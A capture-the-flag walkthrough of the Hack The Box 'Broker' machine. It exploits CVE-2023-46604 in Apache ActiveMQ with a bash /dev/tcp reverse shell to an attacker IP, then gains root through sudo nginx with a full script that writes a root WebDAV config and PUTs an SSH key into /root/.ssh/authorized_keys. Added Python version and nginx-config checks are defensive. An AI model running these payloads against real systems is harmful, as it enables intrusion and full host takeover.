HTB - Broker
Target IP: 10.129.230.87
OS: Ubuntu Linux
Service: Apache ActiveMQ 5.15.15
Difficulty: Easy
Author: [g1nt0n1x]
[auto] zbulim notation: Steps marked with [auto] were performed automatically by zbulim, my automated recon tool. They are shown manually here for proof of concept and documentation purposes.
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery [auto]
We run a targeted service scan against the known ports to identify running services and their versions.
nmap -p 22,80,1883,5672,8161,41101,61613,61614,61616 -sCV -Pn -oA nmap/tcp-targeted 10.129.230.87
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu) [401 Unauthorized - ActiveMQRealm]
1883/tcp open mqtt
5672/tcp open amqp
8161/tcp open http Jetty 9.4.39.v20210325 [401 Unauthorized - ActiveMQRealm]
41101/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
61614/tcp open http Jetty 9.4.39.v20210325
61616/tcp open apachemq ActiveMQ OpenWire transport 5.15.15
Port Analysis & Mapping
- 22/tcp (SSH): OpenSSH is open; once credentials or a key are obtained, shell access is possible.
- 80/tcp (HTTP): nginx returning HTTP 401 (ActiveMQRealm). Directory busting could be an option but is not urgent.
- 1883/tcp (MQTT) & 8161/tcp (HTTP): Both reference Apache ActiveMQ.
- 61616/tcp (OpenWire): Critically, this port leaks the exact ActiveMQ version, 5.15.15, which is the primary attack surface.
1.2 Exploit Research [auto]
My tool zbulim performs automated nmap scanning, directory fuzzing, and ExploitDB lookups. It identified a relevant exploit for this version of ActiveMQ.
searchsploit Apache ActiveMQ
-------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------- ---------------------------------
ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit) | java/remote/42283.rb
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command | windows/remote/40857.txt
Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scriptin | multiple/remote/33905.txt
Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload | windows/remote/48181.rb
Apache ActiveMQ 6.1.6 - Denial of Service (DOS) | multiple/remote/52288.py
-------------------------------------------------------------- ---------------------------------
A quick web search confirms that a public PoC for CVE-2023-46604 (ClassInfo RCE in OpenWire) is available and targets exactly this version range.
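As an added defender-side check that is not part of the original writeup: given an nmap -sV service line like the one above, this snippet decides whether the reported ActiveMQ version falls inside the CVE-2023-46604 affected ranges (the fix shipped in 5.15.16, 5.16.7, 5.17.6 and 5.18.3 according to the Apache advisory). The nmap sample is constructed from the scan output on this page.

```python
import re

# Releases that fixed CVE-2023-46604, one per maintained 5.x branch (Apache advisory).
FIXED_IN = {(5, 15): (5, 15, 16), (5, 16): (5, 16, 7), (5, 17): (5, 17, 6), (5, 18): (5, 18, 3)}

# Constructed sample: the OpenWire line as nmap -sV reports it on this box.
SAMPLE_NMAP = """22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4
61616/tcp open  apachemq ActiveMQ OpenWire transport 5.15.15
"""

OPENWIRE_RE = re.compile(
    r"^(?P<port>\d+)/tcp\s+open\s+\S+\s+ActiveMQ OpenWire transport (?P<ver>\d+\.\d+\.\d+)"
)


def parse_version(text):
    """'5.15.15' -> (5, 15, 15); tuples compare lexicographically, like version numbers."""
    return tuple(int(p) for p in text.split(".")[:3])


def is_vulnerable(version):
    """True when the version lies inside an affected CVE-2023-46604 range."""
    v = parse_version(version)
    if v[:2] in FIXED_IN:
        return v < FIXED_IN[v[:2]]
    # Branches below 5.15 were end-of-life and never received a fix;
    # later branches were released after the fix and are not affected.
    return v < (5, 15)


def triage(nmap_output):
    """Return (port, version, vulnerable) for every OpenWire transport line found."""
    findings = []
    for line in nmap_output.splitlines():
        m = OPENWIRE_RE.match(line.strip())
        if m:
            findings.append((int(m["port"]), m["ver"], is_vulnerable(m["ver"])))
    return findings


if __name__ == "__main__":
    for port, ver, vuln in triage(SAMPLE_NMAP):
        print(f"port {port}: ActiveMQ {ver} -> {'VULNERABLE' if vuln else 'patched'}")
```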
2. Phase 2: Initial Access (CVE-2023-46604)
2.1 Setting Up the Exploit
We clone the public PoC and prepare the payload. The exploit works by sending a crafted OpenWire command that makes the ActiveMQ broker instantiate a ClassPathXmlApplicationContext pointing at a remote XML file; the bean definitions in that file are then executed by the broker process.
git clone https://github.com/rootsecdev/CVE-2023-46604
Edit poc-linux.xml and set the reverse shell command pointing to our listener:
<value>bash -i >& /dev/tcp/10.10.16.149/9001 0>&1</value>
2.2 Executing the Exploit
We host the XML payload via a Python HTTP server, set up a listener, and trigger the exploit against port 61616.
# Terminal 1: Host the XML payload
python3 -m http.server 8888
# Terminal 2: Start listener
rlwrap nc -lvnp 9001
# Terminal 3: Fire the exploit
go run main.go -i 10.129.230.87 -p 61616 -u http://10.10.16.149:8888/poc-linux.xml
2.3 Shell as activemq
The listener receives a connection from the broker process.
activemq@broker:/opt/apache-activemq-5.15.15/bin$ whoami
activemq
3. Phase 3: Privilege Escalation (sudo nginx)
3.1 Sudo Enumeration
As a quick win before running LinPeas, we check what the activemq user can run with elevated privileges.
sudo -l
User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
The ability to run nginx as root without a password is highly exploitable. GTFOBins does not cover a direct shell spawn here, but running nginx as root with a custom config file allows us to expose the root filesystem or write SSH keys.
3.2 Exploiting nginx to Extract the Root SSH Key
We use a publicly known technique: craft a malicious nginx config that runs as user root, starts a DAV-enabled HTTP server on port 1339 serving /, then write our SSH public key into /root/.ssh/authorized_keys via a PUT request.
Save the following as exploit.sh on Kali and transfer it to the victim:
echo "[+] Creating configuration..."
cat << EOF > /tmp/nginx_pwn.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 1339;
root /;
autoindex on;
dav_methods PUT;
}
}
EOF
echo "[+] Loading configuration..."
sudo nginx -c /tmp/nginx_pwn.conf
echo "[+] Generating SSH Key..."
ssh-keygen
echo "[+] Display SSH Private Key for copy..."
cat .ssh/id_rsa
echo "[+] Add key to root user..."
curl -X PUT localhost:1339/root/.ssh/authorized_keys -d "$(cat .ssh/id_rsa.pub)"
echo "[+] Use the SSH key to get access"
Transfer and execute on the victim:
# On Kali:
python3 -m http.server 80
# On victim:
wget http://10.10.16.149/exploit.sh
chmod +x exploit.sh
./exploit.sh
The script prints the generated private key; copy it to Kali as root_key:
[+] Display SSH Private Key for copy...
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktd..../wNbuPvpoXs=
-----END OPENSSH PRIVATE KEY-----
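An added defensive check, not part of the original writeup: the linter below flattens an nginx config such as the /tmp/nginx_pwn.conf written by the script above and flags the directive combination that turns a passwordless sudo nginx into root filesystem access (worker processes as root, document root /, WebDAV write methods, directory listing). The config text is embedded as a constructed sample copied from the script.

```python
import re

# Constructed sample: the config the privilege-escalation script above writes to /tmp/nginx_pwn.conf.
SAMPLE_CONF = """
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events { worker_connections 768; }
http {
    server {
        listen 1339;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
"""

WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}


def parse_directives(conf_text):
    """Flatten an nginx config into (name, args) pairs; comments and block nesting are dropped."""
    text = re.sub(r"#.*", "", conf_text)
    # Braces end a statement just like ';', so 'http {' yields ('http', []) and '}' yields nothing.
    text = text.replace("{", ";").replace("}", ";")
    pairs = []
    for stmt in text.split(";"):
        tokens = stmt.split()
        if tokens:
            pairs.append((tokens[0], tokens[1:]))
    return pairs


def audit_nginx_config(conf_text):
    """Return (critical, findings): critical when root workers meet a writable or '/' document root."""
    findings, as_root, writable, fs_root = [], False, False, False
    for name, args in parse_directives(conf_text):
        if name == "user" and args[:1] == ["root"]:
            as_root = True
            findings.append("worker processes run as root")
        elif name == "root" and args[:1] == ["/"]:
            fs_root = True
            findings.append("document root is the filesystem root")
        elif name == "dav_methods" and WRITE_METHODS & set(args):
            writable = True
            findings.append("WebDAV write methods enabled: " + " ".join(args))
        elif name == "autoindex" and args[:1] == ["on"]:
            findings.append("directory listing enabled")
    return as_root and (writable or fs_root), findings
```

The same check applied to a config running as www-data with a document root under /var/www reports no findings, which is the baseline a host audit should expect.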
3.3 SSH as Root
Save the key locally, set correct permissions, and authenticate.
chmod 600 root_key
ssh -i root_key root@10.129.230.87
root@broker:~# whoami
root
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)
New things learnt
- ActiveMQ exposes its exact version over the OpenWire port (61616), making version-specific CVE lookup trivial.
- CVE-2023-46604 leverages the ClassInfo deserialization flaw: the broker fetches a remote XML file and instantiates arbitrary Java classes.
- sudo nginx with no password can be abused by crafting a custom config that runs as user root, effectively giving full filesystem read access and enabling SSH key extraction.
Checklist added
- Check OpenWire port (61616) for version disclosure
- CVE-2023-46604 (Apache ActiveMQ RCE)
- sudo nginx privilege escalation via custom config